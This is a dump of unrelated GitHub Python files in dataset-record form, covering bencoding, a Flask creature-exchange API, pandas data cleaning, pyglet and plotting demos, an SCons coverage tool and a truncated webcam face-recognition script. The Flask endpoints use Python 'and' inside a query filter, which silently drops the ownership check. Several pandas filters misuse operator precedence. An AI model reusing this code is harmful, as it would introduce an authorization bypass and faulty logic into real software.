r.append(x.bencoded)\n\n\ndef encode_int(x, r):\n r.extend(('i', str(x), 'e'))\n\n\ndef encode_string(x, r):\n r.extend((str(len(x)), ':', x))\n\n\ndef encode_list(x, r):\n r.append('l')\n for i in x:\n encode_func[type(i)](i, r)\n r.append('e')\n\n\ndef encode_dict(x,r):\n r.append('d')\n ilist = list(x.items())\n ilist.sort()\n for k, v in ilist:\n r.extend((str(len(k)), ':', k))\n encode_func[type(v)](v, r)\n r.append('e')\n\n\nencode_func = {\n Bencached: encode_bencached,\n IntType: encode_int,\n LongType: encode_int,\n StringType: encode_string,\n ListType: encode_list,\n TupleType: encode_list,\n DictType: encode_dict,\n}\n\ntry:\n try:\n from types import BooleanType\n except:\n BooleanType = bool\n\n def encode_bool(x, r):\n encode_int(1 if x else 0, r)\n\n encode_func[BooleanType] = encode_bool\n\nexcept:\n pass\n\n\ndef bencode(x):\n r = []\n encode_func[type(x)](x, r)\n return ''.join(r)\n","repo_name":"gil9red/SimplePyScripts","sub_path":"torrent_file/bencode_py3.py","file_name":"bencode_py3.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"5"} +{"seq_id":"69995728793","text":"#!/usr/bin/python3\n\"\"\"post request and print body\"\"\"\nif __name__ == \"__main__\":\n from sys import argv\n import requests\n req = requests.get(argv[1])\n status = req.status_code\n body = req.text\n if status >= 400:\n print(\"Error code:\", status)\n else:\n 
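A round-trip usage sketch for the bencode/bdecode pair above, assuming the module is importable as bencode_py3 (a hypothetical module name; the dict contents are arbitrary):

from bencode_py3 import bencode, bdecode  # hypothetical import path

data = {"n": 42, "spam": ["a", "b"]}
wire = bencode(data)
print(wire)                   # d1:ni42e4:spaml1:a1:bee, keys come out sorted
assert bdecode(wire) == data  # decoding restores the original structure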
print(body)\n","repo_name":"GEEK1050/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/7-error_code.py","file_name":"7-error_code.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36933171191","text":"class Solution:\n def minRemoveToMakeValid(self, s: str) -> str:\n s = list(s)\n stack = []\n for i, char in enumerate(s):\n if char == '(':\n stack.append(i)\n elif char == ')':\n if stack:\n stack.pop()\n else:\n s[i] = ''\n while stack:\n s[stack.pop()] = ''\n return ''.join(s)\n","repo_name":"akashanup/75DaysChallenge","sub_path":"1249.MinimumRemoveToMakeValidParentheses/elegant-solution.py","file_name":"elegant-solution.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"25647424232","text":"import matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport numpy as np\nfrom scipy.integrate import solve_ivp\nfrom mpl_toolkits.mplot3d import Axes3D \n\ndef draw_phase_portrait(alpha):\n \"\"\"\n Draws phase portrait of the system.\n\n :param alpha: Alpha value to draw corresponding phase portrait.\n \"\"\"\n x = np.arange(-2, 2.01, 0.01)\n x1, x2 = np.meshgrid(x, x)\n y1 = alpha * x1 - x2 - x1 * (x1 ** 2 + x2 ** 2)\n y2 = x1 + alpha * x2 - x2 * (x1 ** 2 + x2 ** 2)\n\n fig = plt.figure()\n ax0 = fig.add_subplot()\n ax0.streamplot(x1, x2, y1, y2, color='dodgerblue', linewidth=1)\n ax0.set_title(\"alpha = {}\".format(alpha))\n ax0.set_xlim([-2,2])\n ax0.set_ylim([-2,2])\n plt.xlabel(\"x1\")\n plt.ylabel(\"x2\")\n plt.show()\n\n\ndef calculate_next_state(t, x):\n \"\"\"\n Computes next state of given function based on the previous x value.\n\n :param t: One-dimensional independent variable (time)\n :param x: State of the function.\n :return: New state of the function.\n \"\"\"\n v = [(x[0] - x[1] - x[0] * (x[0] ** 2 + x[1] ** 2)),\n (x[0] + x[1] - x[1] * (x[0] ** 2 + x[1] ** 2))]\n\n x_new = [t * v[0] + x[0], t * v[1] + x[1]]\n\n return x_new\n\n\ndef plot_by_euler_method(x, end_time):\n \"\"\"\n Plots trajectory using Euler Method.\n\n :param x: State of the function.\n :param end_time: Upper bound of simulation time.\n :return: Coordinates of the calculated points.\n \"\"\"\n time_step = 0.001\n points = []\n time = 0\n while time < end_time:\n x = calculate_next_state(t=time_step, x=x)\n points.append(x)\n time += time_step\n\n return [i[0] for i in points], [i[1] for i in points]\n\n\ndef plot_by_svd_solver(x, end_time):\n \"\"\"\n Plots trajectory using solve_ivp.\n\n :param x: State of the function.\n :param end_time: Upper bound of simulation time.\n :return: Coordinates of the calculated points.\n \"\"\"\n t = 0\n sol = solve_ivp(calculate_next_state, [t, t + end_time], np.array(x))\n return sol.y\n\n\ndef cuspFunction(x,alpha1,alpha2):\n \"\"\"\n Computes result of cusp function given its parameters.\n\n :param x: State of the function.\n :param alpha1: First alpha parameter of the function.\n :param alpha2: Second alpha parameter of the function.\n :return: Returns solution of the function.\n \"\"\"\n return alpha1 + alpha2*x - x**3\n\n\ndef cuspBifurcation():\n \"\"\"\n Plots cusp bifurcation.\n \"\"\"\n fig = plt.figure(figsize=(10,10))\n ax0 = fig.gca(projection='3d')\n alpha = np.arange(-1, 1.01, 0.01)\n x_values = np.arange(-1, 1.01, 0.01)\n alpha1, alpha2 = np.meshgrid(alpha, alpha)\n\n for z in x_values:\n X,Y = alpha1,alpha2\n Z = 
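A few spot checks for the parentheses-removal Solution above, assuming the class is in scope (the inputs are the standard cases for this problem):

sol = Solution()
assert sol.minRemoveToMakeValid("lee(t(c)o)de)") == "lee(t(c)o)de"  # drop last ')'
assert sol.minRemoveToMakeValid("))((") == ""                       # nothing matches
assert sol.minRemoveToMakeValid("a(b(c)d)") == "a(b(c)d)"           # already valid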
cuspFunction(z,X,Y)\n cset = ax0.contour(X, Y, Z+z, [z], zdir='z', colors = \"brown\", antialiased=True, linestyles='dotted')\n\n ax0.set_xlabel('alpha1')\n ax0.set_ylabel('alpha2')\n ax0.set_zlabel('x')\n\n plt.title(\"Cusp Bifurcation\")\n plt.show()\n\n\ndef main():\n\n cuspBifurcation()\n \n alphas = [-1,0,1]\n for alpha in alphas:\n draw_phase_portrait(alpha)\n\n fig = plt.figure(figsize=(8,5))\n end_time = 400\n cmap = [\"BuPu\", \"Purples\", \"bwr\"][1]\n initial_points = [[2, 0], [0.5, 0]]\n for index, x in enumerate(initial_points):\n euler_sol = plot_by_euler_method(x, end_time)\n plt.scatter(euler_sol[0], euler_sol[1],linewidth=1,s=1,color=\"teal\")\n plt.scatter(euler_sol[0][0], euler_sol[1][0],color =\"lightcoral\",s=10, label=\"Starting Point\")\n plt.scatter(euler_sol[0][-1], euler_sol[1][-1],color =\"firebrick\",s=10,label=\"Ending Point\")\n plt.title(\"Euler's Method: {}\".format(initial_points[index]))\n plt.xlabel(\"x1\")\n plt.ylabel(\"x2\")\n plt.legend(bbox_to_anchor=(1.05, 1.0), loc='upper left')\n plt.tight_layout()\n plt.show()\n\n svd_sol = plot_by_svd_solver(x, end_time)\n plt.scatter(svd_sol[0], svd_sol[1],s=1,color=\"teal\")\n plt.scatter(svd_sol[0][0], svd_sol[1][0],color =\"lightcoral\",s=10, label=\"Starting Point\")\n plt.scatter(svd_sol[0][-1], svd_sol[1][-1],color =\"firebrick\",s=10,label=\"Ending Point\")\n plt.title(\"SVD Method: {}\".format(initial_points[index]))\n plt.xlabel(\"x1\")\n plt.ylabel(\"x2\")\n plt.legend()\n plt.tight_layout()\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"crowdmodeling20ss/exercise3","sub_path":"task3/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"32672757350","text":"from database import *\n\n# from databaseClasses.Project import Project\n\n\nclass File:\n def __init__(\n self,\n file_name=\"\",\n file_reference=\"\",\n file_size=\"\",\n file_type=\"\",\n url_reference=\"\",\n has_useCase_diagram=False,\n has_Class_diagram=False,\n usecase_diagram_url_reference=None,\n class_diagram_url_reference=None,\n ):\n self.file_name = file_name\n self.file_reference = file_reference\n self.file_size = file_size\n self.file_type = file_type\n self.url_reference = url_reference\n self.has_useCase_diagram = has_useCase_diagram\n self.has_Class_diagram = has_Class_diagram\n self.usecase_diagram_url_reference = usecase_diagram_url_reference\n self.class_diagram_url_reference = class_diagram_url_reference\n\n def get_file_data(self):\n file_dict = {\n \"name\": self.file_name,\n \"type\": self.file_type,\n \"size\": self.file_size,\n \"file_reference\": self.file_reference,\n \"url_reference\": self.url_reference,\n \"has_useCase_diagram\": self.has_useCase_diagram,\n \"has_Class_diagram\": self.has_Class_diagram,\n \"usecase_diagram_url_reference\": self.usecase_diagram_url_reference,\n \"class_diagram_url_reference\": self.class_diagram_url_reference,\n }\n return file_dict\n\n def delete_single_file(self, deleted_file):\n # needs user_id & project_id & file_name\n # project = Project(\n # user_id=deleted_file[\"user_id\"], project_id=deleted_file[\"project_id\"]\n # )\n user_id = deleted_file[\"user_id\"]\n project_id = deleted_file[\"project_id\"]\n\n print(\"Deleting file in database file\")\n print(f\"user id in delete_file database file = {user_id}\")\n print(f\"file_name in delete_file database file = {self.file_name}\")\n print(f\"project_id id in delete_file 
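The Euler stepping above folds the step size into calculate_next_state; a generic explicit-Euler sketch that keeps the derivative f(t, x) separate, run on the same alpha = 1 vector field:

import numpy as np

def euler(f, x0, t_end, dt):
    # explicit Euler: x_{n+1} = x_n + dt * f(t_n, x_n)
    x = np.asarray(x0, dtype=float)
    for t in np.arange(0.0, t_end, dt):
        x = x + dt * np.asarray(f(t, x))
    return x

f = lambda t, x: np.array([x[0] - x[1] - x[0] * (x[0]**2 + x[1]**2),
                           x[0] + x[1] - x[1] * (x[0]**2 + x[1]**2)])
print(euler(f, [2.0, 0.0], 10.0, 1e-3))  # trajectory settles near the unit circle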
database file = {project_id}\")\n\n file_ref = (\n db.collection(\"users\")\n .document(user_id)\n .collection(\"projects\")\n .document(project_id)\n )\n\n # Delete the file from Firebase Firestore\n # doc = file_ref.get()\n file_ref.set(\n {\n \"files\": {},\n },\n merge=True,\n )\n\n return file_ref\n\n def generate_useCase_diagram_with_file(self):\n # needs user_id & user_name & project_id & project_name & file_url_reference & file_name\n pass\n\n def get_content_text(self):\n # print(f\"self.url_reference = {self.url_reference}\")\n response = requests.get(self.url_reference)\n # print(f\"response.text { response.text}\")\n return response.text\n","repo_name":"KirolosYassa/ba-automation","sub_path":"backend/databaseClasses/File.py","file_name":"File.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31274460290","text":"import os\n\nfrom uuid import uuid4\nfrom flask import session, request, send_file\nfrom flask_restful import Resource\n\nfrom warpserver.server import logger\nfrom warpserver.config import UPLOAD_FOLDER\nfrom warpserver.model import Creature, User\nfrom warpserver.model.base import db\nfrom warpserver.util import api_token_required\nfrom werkzeug.utils import secure_filename\n\n\nclass CreatureListResource(Resource):\n @api_token_required\n def get(self):\n creatures = db.session.query(Creature).filter(\n Creature.recipient_user_id == session[\"user\"][\"id\"]\n )\n creature_ids = []\n for creature in creatures:\n creature_ids.append(\n {\n \"id\": creature.id,\n \"filename\": \"%s_%s\" % (creature.uuid, creature.filename),\n }\n )\n return {\"creatures\": [creature.to_dict() for creature in creatures]}\n\n @api_token_required\n def post(self):\n if any(key not in request.files for key in [\"file\"]):\n return {\"message\": \"bad request\"}, 400\n if any(key not in request.form for key in [\"creature_name\", \"recipient\"]):\n return {\"message\": \"bad request\"}, 400\n f = request.files[\"file\"]\n creature_name = request.form[\"creature_name\"]\n recipient = request.form[\"recipient\"]\n recipient_user = (\n db.session.query(User).filter(User.username == recipient).first()\n )\n if not recipient_user:\n return {\"message\": \"recipient user not found\"}, 404\n sender_user = (\n db.session.query(User).filter(User.id == session[\"user\"][\"id\"]).first()\n )\n uuid = str(uuid4())\n file_path = os.path.join(\n UPLOAD_FOLDER, \"creatures\", \"%s_%s\" % (uuid, secure_filename(f.filename))\n )\n try:\n f.save(file_path)\n logger.debug(\n 'saved creature \"%s\" for user \"%s in %s\"'\n % (creature_name, recipient, file_path)\n )\n except Exception as e:\n logger.error(\"Failed to safe File %s - %s\" % (file_path, e))\n return {\"message\": e}, 500\n try:\n creature = Creature(\n creature_name,\n secure_filename(f.filename),\n sender_user,\n recipient_user,\n uuid,\n )\n db.session.add(creature)\n db.session.commit()\n logger.info(\n 'Creature \"%s\" successfully sent from %s to %s'\n % (creature_name, sender_user.username, recipient)\n )\n except Exception as e:\n logger.error(\n 'Failed to save creature \"%s\" to Database. 
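delete_single_file above wipes the whole files map with a merge write; if the intent is to drop only one entry, the google-cloud-firestore client exposes a DELETE_FIELD sentinel for that. A sketch (the files-map layout keyed by file name is an assumption about this schema):

from google.cloud import firestore  # assumes google-cloud-firestore is installed

def delete_one_file(db, user_id, project_id, file_key):
    doc = (db.collection("users").document(user_id)
             .collection("projects").document(project_id))
    # remove a single key from the 'files' map instead of overwriting the map
    doc.update({f"files.{file_key}": firestore.DELETE_FIELD})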
%s' % (f.filename, e)\n )\n return {\"message\": e}, 500\n\n\nclass CreatureResource(Resource):\n \"\"\"Docstring\"\"\"\n\n @api_token_required\n def get(self, creature_id):\n creature = (\n db.session.query(Creature)\n .filter(\n Creature.id == creature_id\n and Creature.recipient_user_id == session[\"user\"][\"id\"]\n )\n .first()\n )\n if not creature:\n return {\"message\": \"creature not found\"}, 404\n file_path = os.path.join(\n UPLOAD_FOLDER, \"creatures\", \"%s_%s\" % (creature.uuid, creature.filename)\n )\n return send_file(\n file_path, attachment_filename=\"%s_%s\" % (creature.uuid, creature.filename)\n )\n\n @api_token_required\n def delete(self, creature_id):\n creature = (\n db.session.query(Creature)\n .filter(\n Creature.id == creature_id\n and Creature.recipient_user_id == session[\"user\"][\"id\"]\n )\n .first()\n )\n if not creature:\n return {\"message\": \"creature not found\"}, 404\n db.session.delete(creature)\n db.session.commit()\n return \"creature deleted\", 200\n","repo_name":"AlbianWarp/AlbianWarpServer","sub_path":"warpserver/resource/creature.py","file_name":"creature.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"26835527290","text":"import pandas as pd\n\ndef importData(file_name:str):\n return pd.read_csv(file_name,sep=\"|\",decimal=\",\",nrows=200000)\n\ndef combineData(datasets):\n combined = pd.DataFrame()\n for dataset in datasets:\n combined = pd.concat([combined,dataset])\n return combined\n\ndef processDataforDashBoard(combined,log_lat):\n #Séparation par Jour,Mois,Année\n try:\n combined['Date mutation'] = pd.to_datetime(combined['Date mutation'], format='%d/%m/%Y')\n except ValueError as e:\n print(f\"Error: {e}\")\n\n combined[\"Année\"] = combined[\"Date mutation\"].dt.year\n combined[\"Mois\"] = combined[\"Date mutation\"].dt.month\n combined[\"Lib mois\"] = [\"Janvier\" if x==1 else \"Février\" if x==2 else \"Mars\" if x==3 else \"Avril\" if x==4 else \"Mai\" if x==5 else \"Juin\" if x==6 else \"Juillet\" if x==7 else \"Août\" if x==8 else \"Septembre\" if x==9 else \"Octobre\" if x==10 else \"Novembre\" if x==11 else \"Décembre\" if x==12 else x for x in combined[\"Mois\"]]\n combined[\"Jour\"] = combined[\"Date mutation\"].dt.day\n #Suppression des colonnes completement nulles\n combined.dropna(axis=1, how='all')\n #Suppression des lignes ou il y a une référence à la même vente (Même addresse à une même date)\n combined = combined.drop_duplicates(subset=[\"Jour\",\"Mois\",\"Année\",\"Code departement\",\"Code commune\",\"Code voie\"],keep=False)\n combined[\"Catégorie Surface terrain\"] = [\"Petite\" if x<=100 else \"Moyenne\" if x<=10000 else \"Grande\" for x in combined[\"Surface terrain\"]]\n combined[\"Id\"] = combined.index\n #Dataframe ventilé en fonction des différents axes d'analyse intéressants\n\n # Suppression des lignes sans valeur foncière\n combined[\"Valeur fonciere\"] = combined[\"Valeur fonciere\"].replace(\",\",\".\").astype(float)\n combined = combined[combined[\"Valeur fonciere\"] >1 & combined[\"Valeur fonciere\"].notna()]\n log_lat = log_lat[['nom_departement', 'nom_region','code_commune_INSEE', 'nom_commune_postal', 'latitude', 'longitude']]\n combined = pd.merge(combined, log_lat, left_on='Commune', right_on='nom_commune_postal')\n return combined\n\ndef processDataforPrediction(combined:pd.DataFrame):\n #Suppression des colonnes completement nulles\n cleaned = combined.dropna(axis=1, how='all')\n cleaned = 
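One pitfall in the filtering code just above: & binds tighter than comparison operators in Python, so an unparenthesized chain like combined["Valeur fonciere"] > 1 & combined["Valeur fonciere"].notna() evaluates the bitwise & first. Each comparison needs its own parentheses, as in this minimal sketch:

import pandas as pd

df = pd.DataFrame({"Valeur fonciere": [0.0, 1.0, 250000.0, None]})
mask = (df["Valeur fonciere"] > 1) & (df["Valeur fonciere"].notna())
print(df[mask])  # keeps only the 250000.0 row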
cleaned.drop_duplicates(subset=[\"Jour\",\"Mois\",\"Année\",\"Code departement\",\"Code commune\",\"Code voie\"])\n cleaned.drop([\"Année\",\"Mois\",\"Jour\",\"Date mutation\"])\n cleaned = cleaned[cleaned[\"Valeur fonciere\"] != 0 & cleaned[\"Valeur fonciere\"] != 1 & cleaned[\"Valeur fonciere\"].notna()]\n percentage_missing = (cleaned.isna().sum() / len(cleaned)) * 100\n for colonne in cleaned:\n if percentage_missing[colonne] > 80 & colonne != \"Type local\":\n cleaned.drop(colonne, axis=1, inplace=True) \n \n return cleaned\n","repo_name":"LeoGondouin/ML_Python","sub_path":"controllers/process/ImportController.py","file_name":"ImportController.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9173140618","text":"from oop import *\n# bouncing ball with air and fluid resistance\n\nclass Liquid(pyglet.shapes.Rectangle):\n def __init__(self, win, *args, **kwargs):\n super().__init__(color=(0, 0, 255), *args, **kwargs)\n self.win = win\n self.opacity = 150\n self.c = 1\n \n\nclass Ball(pyglet.shapes.Circle):\n def __init__(self, win, *args, **kwargs):\n super().__init__(radius=20, color=(255, 0, 0), *args, **kwargs)\n self.win = win\n self.opacity = 150\n self.dx = 2\n self.dy = 2\n self.radius = random.randint(5, 50)\n self.m = self.radius / 10\n self.gravity = 0, -0.1\n self.wind = 0.02, 0\n \n def update(self, dt):\n self.dx += (self.gravity[0] + self.wind[0]/self.m)\n self.dy += (self.gravity[1] + self.wind[1]/self.m)\n \n self.x += self.dx\n self.y += self.dy\n \n if self.x < self.radius:\n self.dx = abs(self.dx)\n elif self.x > self.win.width-self.radius:\n self.dx = -abs(self.dx)\n \n if self.y < self.radius:\n self.dy = abs(self.dy)\n elif self.y > self.win.height-self.radius:\n self.dy = -abs(self.dy)\n \n def is_inside_rect(self, x, y, w, h):\n return x < self.x < x+w and y < self.y < y+h\n \n def drag(self, liq):\n v = (self.dx ** 2 + self.dy ** 2) ** 0.5\n \n \nclass AppWindow(pyglet.window.Window):\n # This is the app window\n def __init__(self, *args):\n super().__init__(*args)\n self.liquid = Liquid(self, 0, 0, self.width, self.height//3)\n \n n = 10\n self.balls = []\n for i in range(n):\n x = random.randint(0, self.width)\n y = random.randint(0, self.height)\n b = Ball(self, x=x, y=y)\n self.balls.append(b)\n pyglet.clock.schedule_interval(b.update, 1/120.0)\n \n self.status = pyglet.text.Label('status', x=10, y=10)\n self.clear()\n\n def on_draw(self):\n self.clear() \n for ball in self.balls:\n ball.draw()\n self.liquid.draw()\n \n def on_mouse_press(self, x, y, button, modifiers):\n self.balls[0].x = x\n self.balls[0].y = y\n\nif __name__ == '__main__':\n win = AppWindow(800, 300)\n win1 = AppWindow(600, 400)\n pyglet.app.run()\n sys.exit()\n","repo_name":"rasql/edunum","sub_path":"doc/oop/oop5.py","file_name":"oop5.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"10037854567","text":"def AddCoverageSetup(env):\n \"\"\"Add coverage related build steps and dependency links.\n\n Args:\n env: a leaf environment ready to have coverage steps added.\n \"\"\"\n # Add a step to start coverage (for instance windows needs this).\n # This step should get run before and tests are run.\n if env.get('COVERAGE_START_CMD', None):\n start = env.Command('$COVERAGE_START_FILE', [], '$COVERAGE_START_CMD')\n env.AlwaysBuild(start)\n else:\n start = []\n\n # Add a step to end coverage 
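Ball.drag above computes the speed but never applies a force; a sketch of the quadratic fluid drag it appears to be heading toward (the coefficient c would come from the Liquid):

import math

def drag_force(dx, dy, c):
    # quadratic drag: magnitude c * v**2, direction opposite to velocity,
    # i.e. F = -c * v * (dx, dy), since (dx, dy) / v is the unit vector
    v = math.hypot(dx, dy)
    if v == 0.0:
        return 0.0, 0.0
    return -c * v * dx, -c * v * dy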
(used on basically all platforms).\n # This step should get after all the tests have run.\n if env.get('COVERAGE_STOP_CMD', None):\n stop = env.Command('$COVERAGE_OUTPUT_FILE', [], '$COVERAGE_STOP_CMD')\n env.AlwaysBuild(stop)\n else:\n stop = []\n\n # start must happen before tests run, stop must happen after.\n for group in env.SubstList2('$COVERAGE_TARGETS'):\n group_alias = env.Alias(group)\n # Force each alias to happen after start but before stop.\n env.Requires(group_alias, start)\n env.Requires(stop, group_alias)\n # Force each source of the aliases to happen after start but before stop.\n # This is needed to work around non-standard aliases in some projects.\n for test in group_alias:\n for s in test.sources:\n env.Requires(s, start)\n env.Requires(stop, s)\n\n # Add an alias for coverage.\n env.Alias('coverage', [start, stop])\n\n\ndef generate(env):\n # NOTE: SCons requires the use of this name, which fails gpylint.\n \"\"\"SCons entry point for this tool.\"\"\"\n\n env['COVERAGE_ENABLED'] = True\n\n env.SetDefault(\n # Setup up coverage related tool paths.\n # These can be overridden elsewhere, if needed, to relocate the tools.\n COVERAGE_MCOV='mcov',\n COVERAGE_GENHTML='genhtml',\n COVERAGE_ANALYZER='coverage_analyzer.exe',\n COVERAGE_VSPERFCMD='VSPerfCmd.exe',\n COVERAGE_VSINSTR='vsinstr.exe',\n\n # Setup coverage related locations.\n COVERAGE_DIR='$TARGET_ROOT/coverage',\n COVERAGE_HTML_DIR='$COVERAGE_DIR/html',\n COVERAGE_START_FILE='$COVERAGE_DIR/start.junk',\n COVERAGE_OUTPUT_FILE='$COVERAGE_DIR/coverage.lcov',\n\n # The list of aliases containing test execution targets.\n COVERAGE_TARGETS=['run_all_tests'],\n )\n\n # Add in coverage flags. These come from target_platform_xxx.\n env.Append(\n CCFLAGS='$COVERAGE_CCFLAGS',\n LIBS='$COVERAGE_LIBS',\n LINKFLAGS='$COVERAGE_LINKFLAGS',\n SHLINKFLAGS='$COVERAGE_SHLINKFLAGS',\n )\n\n # Change the definition of Install if required by the platform.\n if env.get('COVERAGE_INSTALL'):\n env['PRECOVERAGE_INSTALL'] = env['INSTALL']\n env['INSTALL'] = env['COVERAGE_INSTALL']\n\n # Add any extra paths.\n env.AppendENVPath('PATH', env.SubstList2('$COVERAGE_EXTRA_PATHS'))\n\n # Add coverage start/stop and processing in deferred steps.\n env.Defer(AddCoverageSetup)\n","repo_name":"Labs22/BlackServerOS","sub_path":"cryptography/keyczar-master/keyczar-master/cpp/src/tools/swtoolkit/site_scons/site_tools/code_coverage.py","file_name":"code_coverage.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"5"} +{"seq_id":"32959917636","text":"import pandas as pd\ndef get_trial_task(sentence,status_response_check):\n word = sentence\n print(word)\n word_list= word.split(' ')\n print(word_list)\n path = './././hr/trial_model/STR.xlsx'\n dataf = pd.read_excel(path)\n print(dataf)\n column_1=dataf['External Ref.']\n #new_col = str.column_1\n col_1 = column_1.str.lower()\n #new=((column_1)['External Ref.'])column_1\n print(column_1)\n\n for d in word_list:\n status = dataf[d == col_1]['Status']\n task_id = dataf[d == col_1]['Task ID']\n task_name=dataf[d == col_1]['External Ref.']\n task_exe=(dataf[d == col_1]['Execution Time'].astype(str))\n task_err=dataf[d == col_1]['Error Count']\n status_df = pd.concat([status,task_id,task_name,task_exe,task_err],axis =1)\n print(\"Status\",status)\n if status_response_check == 'status_name':\n return status_df\n else:\n return 'No data found'\n return 'No data 
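The per-word lookup loop in the status script nearby can also be expressed as one vectorized, case-insensitive membership test; a sketch with placeholder data:

import pandas as pd

df = pd.DataFrame({"External Ref.": ["Alpha", "Beta"], "Status": ["OK", "FAIL"]})
words = ["alpha", "gamma"]
hits = df[df["External Ref."].str.lower().isin([w.lower() for w in words])]
print(hits)  # only the Alpha row matches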
found'\n\n","repo_name":"quinnoxai/calypso","sub_path":"hr/trial_model/status_by_name.py","file_name":"status_by_name.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3594443773","text":"import shutil, pathlib\n\nfile = str(input(\"请输入欲要复制的档名(可含副档名):\"))\ncopyFile = str(input(\"请输入复制档案的名称(可含副档名):\"))\n\npath = pathlib.Path.cwd() / copyFile\n\nif path.exists() == True:\n print(\"\\n该档名已存在\")\nelse:\n is_Success = shutil.copyfile(file, copyFile)\n print(\"已复制完成档案{}:\".format(is_Success))\n\n is_Move = shutil.move(copyFile, \"D:\\\\\")\n print(\"并移动至该路径:{}\".format(is_Move))\n","repo_name":"thomaslao/python","sub_path":"MP32104_Example/ch10/ExShutil.py","file_name":"ExShutil.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"7120347912","text":"import face_recognition\nimport cv2\nimport pickle\n\n\n\ndef predict(frame, knn_clf=None, model_path=None, distance_threshold=0.6):\n \"\"\"\n Recognizes faces in given image using a trained KNN classifier\n :param X_img_path: path to image to be recognized\n :param knn_clf: (optional) a knn classifier object. if not specified, model_save_path must be specified.\n :param model_path: (optional) path to a pickled knn classifier. if not specified, model_save_path must be knn_clf.\n :param distance_threshold: (optional) distance threshold for face classification. the larger it is, the more chance\n of mis-classifying an unknown person as a known one.\n :return: a list of names and face locations for the recognized faces in the image: [(name, bounding box), ...].\n For faces of unrecognized persons, the name 'unknown' will be returned.\n \"\"\"\n # if not os.path.isfile(X_img_path) or os.path.splitext(X_img_path)[1][1:] not in ALLOWED_EXTENSIONS:\n # raise Exception(\"Invalid image path: {}\".format(X_img_path))\n\n # if knn_clf is None and model_path is None:\n # raise Exception(\"Must supply knn classifier either thourgh knn_clf or model_path\")\n\n # Load a trained KNN model (if one was passed in)\n if knn_clf is None:\n with open(model_path, 'rb') as f:\n knn_clf = pickle.load(f)\n\n # frame = X_img_path\n # Load image file and find face locations\n # X_img = face_recognition.load_image_file(X_img_path)\n X_face_locations = face_recognition.face_locations(frame)\n\n # If no faces are found in the image, return an empty result.\n if len(X_face_locations) == 0:\n return []\n\n # Find encodings for faces in the test iamge\n faces_encodings = face_recognition.face_encodings(frame, known_face_locations=X_face_locations)\n\n # Use the KNN model to find the best matches for the test face\n closest_distances = knn_clf.kneighbors(faces_encodings, n_neighbors=1)\n print(\"close\",closest_distances)\n are_matches = [closest_distances[0][i][0] <= distance_threshold for i in range(len(X_face_locations))]\n print(\"**********************\")\n print(\"face\", knn_clf.predict(faces_encodings))\n print(\"xface\", X_face_locations)\n print(\"are\",are_matches)\n print(\"close\",closest_distances)\n print(\"************end***********\")\n\n fourth = closest_distances\n print(\"fou1\", type(fourth[0]))\n print(\"f_tols\", fourth[0].tolist())\n print(\"sunm\", sum(fourth[0].tolist(), []))\n fourth = list(map(lambda x : int(x*100), sum(fourth[0].tolist(), [])))\n print(\"fou2\", fourth)\n\n\n # Predict classes and remove classifications that aren't within the 
threshold\n # return [(pred, loc) if rec else (\"unknown\", loc) for pred, loc, rec in zip(knn_clf.predict(faces_encodings), X_face_locations, are_matches)] orignal without percentage\n\n return [(pred, loc, clos) if rec else (\"unknown\", loc, clos) for pred, loc, rec, clos in zip(knn_clf.predict(faces_encodings), X_face_locations, are_matches, fourth)]\n\n\ndef show_prediction_labels_on_image(frame, predictions):\n \"\"\"\n Shows the face recognition results visually.\n :param img_path: path to image to be recognized\n :param predictions: results of the predict function\n :return:\n \"\"\"\n # pil_image = Image.open(img_path).convert(\"RGB\")\n # draw = ImageDraw.Draw(pil_image)\n print(\"percentage is :\", predictions)\n for name, (top, right, bottom, left), percen in predictions:\n print(\"percentage is :\", predictions)\n # # Draw a box around the face using the Pillow module\n # draw.rectangle(((left, top), (right, bottom)), outline=(0, 0, 255))\n\n # # There's a bug in Pillow where it blows up with non-UTF-8 text\n # # when using the default bitmap font\n # name = name.encode(\"UTF-8\")\n\n # # Draw a label with a name below the face\n # text_width, text_height = draw.textsize(name)\n # draw.rectangle(((left, bottom - text_height - 10), (right, bottom)), fill=(0, 0, 255), outline=(0, 0, 255))\n # draw.text((left + 6, bottom - text_height - 5), name, fill=(255, 255, 255, 255))\n\n # frame = img_path\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n # Draw a label with a name below the face\n cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, name + str(percen)+\"%\", (left + 6, bottom - 6), font, 0.8, (255, 255, 255), 1)\n\n # Remove the drawing library from memory as per the Pillow docs\n # del draw\n\n # Display the resulting image\n # pil_image.show()\n return frame\n\n\n\nvideo_capture = cv2.VideoCapture(0)\n# video_capture = cv2.VideoCapture('rtsp://test:test$1234@192.168.0.73:554/Streaming/channels/202/')\n\nwhile True:\n # Grab a single frame of video\n ret, frame = 